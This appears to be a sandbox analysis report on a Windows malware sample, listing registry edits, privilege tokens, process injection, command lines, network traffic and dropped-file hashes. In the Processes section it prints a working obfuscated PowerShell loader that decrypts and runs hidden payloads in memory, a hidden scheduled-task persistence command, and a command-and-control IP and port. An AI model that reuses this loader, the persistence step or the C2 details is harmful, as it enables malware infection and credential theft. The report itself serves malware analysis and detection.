Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\explorer.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3236 wrote to memory of 1340 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3236 wrote to memory of 1340 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1340 wrote to memory of 2516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1340 wrote to memory of 2516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1340 wrote to memory of 4612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 4612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 3612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 3612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 4772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 4772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 2140 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 2140 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 1664 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 4612 wrote to memory of 1664 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 1664 wrote to memory of 2092 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\All-In-One.exe
PID 1664 wrote to memory of 2092 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\All-In-One.exe
PID 1664 wrote to memory of 2092 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\All-In-One.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1188 wrote to memory of 3372 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1188 wrote to memory of 3372 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1188 wrote to memory of 3372 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 1644 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\explorer.exe
PID 3372 wrote to memory of 1644 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\explorer.exe
PID 3372 wrote to memory of 1644 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\explorer.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wild2.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\dropped.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('ugGNW2NnPvk9adSUBcDc96/inp4cdhLsP4c8Xr7rMvA='); $aes_var.IV=[System.Convert]::FromBase64String('GuK3QAh6wjXaE/OXIlyZUw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ikyRS=New-Object System.IO.MemoryStream(,$param_var); $tIvxd=New-Object System.IO.MemoryStream; $uIXwv=New-Object System.IO.Compression.GZipStream($ikyRS, [IO.Compression.CompressionMode]::Decompress); $uIXwv.CopyTo($tIvxd); $uIXwv.Dispose(); $ikyRS.Dispose(); $tIvxd.Dispose(); $tIvxd.ToArray();}function execute_function($param_var,$param2_var){ $kiXtP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $zdYbv=$kiXtP.EntryPoint; $zdYbv.Invoke($null, $param2_var);}$dTbxL = 'C:\Users\Admin\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $dTbxL;$cGnsR=[System.IO.File]::ReadAllText($dTbxL).Split([Environment]::NewLine);foreach ($QrlnJ in $cGnsR) { if ($QrlnJ.StartsWith('oJuhxRvpkzgxXdlXhMuO')) { $JHuZc=$QrlnJ.Substring(20); break; }}$payloads_var=[string[]]$JHuZc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\dropped')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c Cd %temp% && All-In-One.exe OutPut.json

C:\Users\Admin\AppData\Local\Temp\All-In-One.exe

All-In-One.exe OutPut.json

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 142.202.242.177 7000 <123456789> E7454CC4D6D92D307990

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 142.202.242.177:7000 tcp
US 8.8.8.8:53 177.242.202.142.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 142.202.242.177:7000 tcp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\dropped.bat

MD5 e770f53921bca6b9d02faf3e70059249
SHA1 fb04530ec135f2a34afd3bdf0c205193418812b6
SHA256 be7e5d1cccf5602cbe866ce6f342bd960263f3cd08a75d149372af37fa2a50b1
SHA512 f970fab83358451a7cb158d4377defa35188996b1f2005a90e1fe0e747db65424366efcc847c133919395310536348bc795caef3161a21b70b2b0cd16566ec86

memory/4612-2-0x00007FFFDF373000-0x00007FFFDF375000-memory.dmp

memory/4612-12-0x0000020FF3050000-0x0000020FF3072000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jo2u1dha.lar.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4612-13-0x00007FFFDF370000-0x00007FFFDFE31000-memory.dmp

memory/4612-14-0x00007FFFDF370000-0x00007FFFDFE31000-memory.dmp

memory/4612-15-0x0000020FF3460000-0x0000020FF34A4000-memory.dmp

memory/4612-16-0x0000020FF3530000-0x0000020FF35A6000-memory.dmp

memory/4612-28-0x0000020FF30A0000-0x0000020FF30A8000-memory.dmp

memory/4612-29-0x0000020FF30B0000-0x0000020FF30C0000-memory.dmp

memory/4612-30-0x00007FFFFD890000-0x00007FFFFDA85000-memory.dmp

memory/4612-32-0x0000020FF3410000-0x0000020FF3424000-memory.dmp

memory/4612-31-0x00007FFFFD1F0000-0x00007FFFFD2AE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3f01549ee3e4c18244797530b588dad9
SHA1 3e87863fc06995fe4b741357c68931221d6cc0b9
SHA256 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA512 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 97748f71ed95026706014e8524266292
SHA1 f60663ea2e2a778c57d07d9678fe04c79c3ff942
SHA256 f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f
SHA512 b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9

memory/4612-56-0x0000020FF3920000-0x0000020FF3936000-memory.dmp

memory/4612-58-0x00007FFFDF373000-0x00007FFFDF375000-memory.dmp

memory/4612-59-0x00007FFFDF370000-0x00007FFFDFE31000-memory.dmp

memory/4612-60-0x0000020FF4570000-0x0000020FF468E000-memory.dmp

memory/4612-99-0x0000020FF4EF0000-0x0000020FF53C4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\External\Components\nss3.dll

MD5 7ddbd64d87c94fd0b5914688093dd5c2
SHA1 d49d1f79efae8a5f58e6f713e43360117589efeb
SHA256 769703fb1ba6c95fb6c889e8a9baaea309e62d0f3ca444d01cc6b495c0f722d1
SHA512 60eaad58c3c4894f1673723eb28ddb42b681ff7aafe7a29ff8bf87a2da6595c16d1f8449096accdb89bd6cda6454eb90470e71dde7c5bd16abd0f80e115cfa2d

C:\Users\Admin\AppData\Local\Temp\External\Components\nspr4.dll

MD5 72414dfb0b112c664d2c8d1215674e09
SHA1 50a1e61309741e92fe3931d8eb606f8ada582c0a
SHA256 69e73fea2210adc2ae0837ac98b46980a09fe91c07f181a28fda195e2b9e6b71
SHA512 41428624573b4a191b33657ed9ad760b500c5640f3d62b758869a17857edc68f90bc10d7a5e720029519c0d49b5ca0fa8579743e80b200ef331e41efde1dc8c9

C:\Users\Admin\AppData\Local\Temp\External\Components\plc4.dll

MD5 c73ec58b42e66443fafc03f3a84dcef9
SHA1 5e91f467fe853da2c437f887162bccc6fd9d9dbe
SHA256 2dc0171b83c406db6ec9389b438828246b282862d2b8bdf2f5b75aec932a69f7
SHA512 6318e831d8f38525e2e49b5a1661440cd8b1f3d2afc6813bb862c21d88d213c4675a8ec2a413b14fbdca896c63b65a7da6ec9595893b352ade8979e7e86a7fcf

C:\Users\Admin\AppData\Local\Temp\External\Components\plds4.dll

MD5 ee44d5d780521816c906568a8798ed2f
SHA1 2da1b06d5de378cbfc7f2614a0f280f59f2b1224
SHA256 50b2735318233d6c87b6efccccc23a0e3216d2870c67f2f193cc1c83c7c879fc
SHA512 634a1cd2baaef29b4fe7c7583c04406bb2ea3a3c93294b31f621652844541e7c549da1a31619f657207327604c261976e15845571ee1efe5416f1b021d361da8

C:\Users\Admin\AppData\Local\Temp\External\Components\softokn3.dll

MD5 e846285b19405b11c8f19c1ed0a57292
SHA1 2c20cf37394be48770cd6d396878a3ca70066fd0
SHA256 251f0094b6b6537df3d3ce7c2663726616f06cfb9b6de90efabd67de2179a477
SHA512 b622ff07ae2f77e886a93987a9a922e80032e9041ed41503f0e38abb8c344eb922d154ade29e52454d0a1ad31596c4085f4bd942e4412af9f0698183acd75db7

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-conio-l1-1-0_not.dll

MD5 6ea692f862bdeb446e649e4b2893e36f
SHA1 84fceae03d28ff1907048acee7eae7e45baaf2bd
SHA256 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2
SHA512 9661c135f50000e0018b3e5c119515cfe977b2f5f88b0f5715e29df10517b196c81694d074398c99a572a971ec843b3676d6a831714ab632645ed25959d5e3e7

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-convert-l1-1-0.dll

MD5 72e28c902cd947f9a3425b19ac5a64bd
SHA1 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7
SHA256 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1
SHA512 58ab6fedce2f8ee0970894273886cb20b10d92979b21cda97ae0c41d0676cc0cd90691c58b223bce5f338e0718d1716e6ce59a106901fe9706f85c3acf7855ff

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-environment-l1-1-0.dll

MD5 ac290dad7cb4ca2d93516580452eda1c
SHA1 fa949453557d0049d723f9615e4f390010520eda
SHA256 c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382
SHA512 b5e2b9f5a9dd8a482169c7fc05f018ad8fe6ae27cb6540e67679272698bfca24b2ca5a377fa61897f328b3deac10237cafbd73bc965bf9055765923aba9478f8

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 aec2268601470050e62cb8066dd41a59
SHA1 363ed259905442c4e3b89901bfd8a43b96bf25e4
SHA256 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2
SHA512 0c14d160bfa3ac52c35ff2f2813b85f8212c5f3afbcfe71a60ccc2b9e61e51736f0bf37ca1f9975b28968790ea62ed5924fae4654182f67114bd20d8466c4b8f

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-heap-l1-1-0.dll

MD5 93d3da06bf894f4fa21007bee06b5e7d
SHA1 1e47230a7ebcfaf643087a1929a385e0d554ad15
SHA256 f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d
SHA512 72bd6d46a464de74a8dac4c346c52d068116910587b1c7b97978df888925216958ce77be1ae049c3dccf5bf3fffb21bc41a0ac329622bc9bbc190df63abb25c6

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-locale-l1-1-0.dll

MD5 a2f2258c32e3ba9abf9e9e38ef7da8c9
SHA1 116846ca871114b7c54148ab2d968f364da6142f
SHA256 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33
SHA512 e98cbc8d958e604effa614a3964b3d66b6fc646bdca9aa679ea5e4eb92ec0497b91485a40742f3471f4ff10de83122331699edc56a50f06ae86f21fad70953fe

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-math-l1-1-0.dll

MD5 8b0ba750e7b15300482ce6c961a932f0
SHA1 71a2f5d76d23e48cef8f258eaad63e586cfc0e19
SHA256 bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed
SHA512 fb646cdcdb462a347ed843312418f037f3212b2481f3897a16c22446824149ee96eb4a4b47a903ca27b1f4d7a352605d4930df73092c380e3d4d77ce4e972c5a

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-multibyte-l1-1-0.dll

MD5 35fc66bd813d0f126883e695664e7b83
SHA1 2fd63c18cc5dc4defc7ea82f421050e668f68548
SHA256 66abf3a1147751c95689f5bc6a259e55281ec3d06d3332dd0ba464effa716735
